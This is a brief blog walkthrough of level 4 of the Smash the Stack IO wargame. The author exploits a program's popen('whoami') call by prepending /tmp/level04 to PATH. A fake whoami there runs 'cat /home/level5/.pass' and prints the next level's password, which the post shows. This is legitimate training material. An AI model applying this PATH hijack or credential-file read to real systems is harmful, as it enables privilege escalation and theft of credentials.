SMASH THE STACK LEVEL4
Date: December 3, 2014
level 4 ๐
|
1 2 3 4 5 6 7 |
level4@io:~$ cd /levels/ level4@io:/levels$ ./level04 Welcome level5 level4@io:/levels$ ./level04 d Welcome level5 level4@io:/levels$ ./level04 $(python -c "print 'A' * 1024") Welcome level5 |
so i will read the code
|
1 2 3 4 5 6 7 8 |
int main() { char username[1024]; FILE* f = popen("whoami","r"); fgets(username, sizeof(username), f); printf("Welcome %s", username); return 0; } |
popen to execute whoami
save the output in f
fgets to read the output
print f to print the output
very simple one
I don’t think it needs overflow ๐
I can trick the software to read /home/level5/.pass
as it uses command whoami
and this command located in my system
it finds it through the $PATH
so this is the point
i will create new file in /tmp/level04/whoami
same name of the command
content
catย /home/level5/.pass
so when it runs my whoami then read the password
so I have to set theย /tmp/level04 in my path variable + it should be loaded before any other apps in bins
|
1 2 3 4 5 6 7 8 9 10 11 |
level4@io:/levels$ echo $PATH /tmp/level04/:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games level4@io:/levels$ whoami level4 level4@io:/levels$ mkdir /tmp/level04 level4@io:/levels$ vi /tmp/level04/whoami level4@io:/levels$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games level4@io:/levels$ export PATH=/tmp/level04/:$PATH level4@io:/levels$ whoami level4 |
|
1 2 3 |
level4@io:/levels$ chmod +x /tmp/level04/whoami level4@io:/levels$ ./level04 Welcome LOoCy5PbKi63qXTh |
very simple for me
This site uses Akismet to reduce spam. Learn how your comment data is processed.
Leave a Reply